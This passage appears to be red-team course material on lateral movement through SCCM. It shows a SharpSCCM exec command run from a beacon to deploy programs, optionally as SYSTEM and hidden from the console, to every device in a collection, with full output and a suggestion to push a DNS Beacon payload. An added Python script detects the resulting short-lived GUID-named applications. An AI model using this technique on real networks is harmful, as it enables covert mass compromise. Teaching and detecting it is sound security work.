With Full or Application Administrator privileges over a device or a collection, we can deploy scripts or applications to aid in lateral movement. To execute a command on every device in the DEV collection, we could use SharpSCCM's exec command: exec -n DEV -p <path>.
SharpSCCM attempts to hide the application (i.e. the command we're executing) from the GUI, but the deployment is still visible until it completes.
By default, the command below executes Notepad as the user currently logged into each machine. If no user is logged in, the command won't execute. We can force it to execute as SYSTEM using the -s parameter, in which case it runs on every machine regardless of whether a user is currently logged in. As with the GPO Abuse chapter, we can upload and execute a DNS Beacon payload.
beacon> execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe exec -n DEV -p C:\Windows\notepad.exe --no-banner
[+] Creating new application: Application_4b981c0c-ccc4-4971-b6cc-ff774770be5c
[+] Application path: C:\Windows\notepad.exe
[+] Updated application to hide it from the Configuration Manager console
[+] Updated application to run in the context of the logged on user
[+] Successfully created application
[+] Creating new deployment of Application_4b981c0c-ccc4-4971-b6cc-ff774770be5c to DEV (S0100014)
[+] Found the Application_4b981c0c-ccc4-4971-b6cc-ff774770be5c application
[+] Successfully created deployment of Application_4b981c0c-ccc4-4971-b6cc-ff774770be5c to DEV (S0100014)
[+] New deployment name: Application_4b981c0c-ccc4-4971-b6cc-ff774770be5c_S0100014_Install
[+] Waiting for new deployment to become available...
[+] New deployment is available, waiting 30 seconds for updated policy to become available
[+] Forcing all members of DEV (S0100014) to retrieve machine policy and execute any new applications available
[+] Waiting 1 minute for execution to complete...
[+] Cleaning up
[+] Found the Application_4b981c0c-ccc4-4971-b6cc-ff774770be5c_S0100014_Install deployment
[+] Deleted the Application_4b981c0c-ccc4-4971-b6cc-ff774770be5c_S0100014_Install deployment
[+] Querying for deployments of Application_4b981c0c-ccc4-4971-b6cc-ff774770be5c_S0100014_Install
[+] No remaining deployments named Application_4b981c0c-ccc4-4971-b6cc-ff774770be5c_S0100014_Install were found
[+] Found the Application_4b981c0c-ccc4-4971-b6cc-ff774770be5c application
[+] Deleted the Application_4b981c0c-ccc4-4971-b6cc-ff774770be5c application
[+] Querying for applications named Application_4b981c0c-ccc4-4971-b6cc-ff774770be5c
[+] No remaining applications named Application_4b981c0c-ccc4-4971-b6cc-ff774770be5c were found
[+] Completed execution in 00:02:18.2210387
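The output above leaves a pattern a defender can hunt for: an application named Application_<GUID>, a deployment named <application>_<CollectionID>_Install, and both created and deleted again within a couple of minutes. The following is an added example, not part of the original page or of SharpSCCM, that flags that create-then-delete pattern in audit events. The (timestamp, action, name) event layout, the function name and the 10-minute threshold are assumptions to adapt to your own audit export.

```python
import re
from datetime import datetime, timedelta

# Name shapes taken from the tool output on this page.
GUID = r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}"
APP_RE = re.compile(rf"^(Application_{GUID})(?:_([0-9A-Z]{{8}})_Install)?$", re.I)

# Constructed sample events: (ISO timestamp, action, object name).
# The tuple layout is an assumption; map it from your own audit export.
SAMPLE_EVENTS = [
    ("2024-01-10T09:00:05", "create", "Application_4b981c0c-ccc4-4971-b6cc-ff774770be5c"),
    ("2024-01-10T09:00:09", "create", "Application_4b981c0c-ccc4-4971-b6cc-ff774770be5c_S0100014_Install"),
    ("2024-01-10T09:02:01", "delete", "Application_4b981c0c-ccc4-4971-b6cc-ff774770be5c_S0100014_Install"),
    ("2024-01-10T09:02:10", "delete", "Application_4b981c0c-ccc4-4971-b6cc-ff774770be5c"),
    ("2024-01-10T09:30:00", "create", "7-Zip 23.01 x64"),  # ordinary application
    ("2024-01-11T08:00:00", "create", "Application_0a1b2c3d-1111-2222-3333-444455556666"),
]

def find_short_lived_apps(events, max_lifetime=timedelta(minutes=10)):
    """Flag GUID-named applications created and deleted within max_lifetime."""
    created, collections, findings = {}, {}, []
    for ts, action, name in sorted(events):  # ISO timestamps sort chronologically
        m = APP_RE.match(name)
        if not m:
            continue  # name does not follow the Application_<GUID> shape
        app, coll = m.group(1), m.group(2)
        when = datetime.fromisoformat(ts)
        if coll:
            # Deployment object: record which collection was targeted.
            collections.setdefault(app, set()).add(coll.upper())
        elif action == "create":
            created[app] = when
        elif action == "delete" and app in created:
            lifetime = when - created.pop(app)
            if lifetime <= max_lifetime:
                findings.append({
                    "application": app,
                    "collections": sorted(collections.get(app, ())),
                    "lifetime_seconds": int(lifetime.total_seconds()),
                })
    return findings

if __name__ == "__main__":
    for finding in find_short_lived_apps(SAMPLE_EVENTS):
        print(finding)
```

A GUID-named application that is created but never deleted, like the last sample event, is not flagged by this check and is worth reviewing separately.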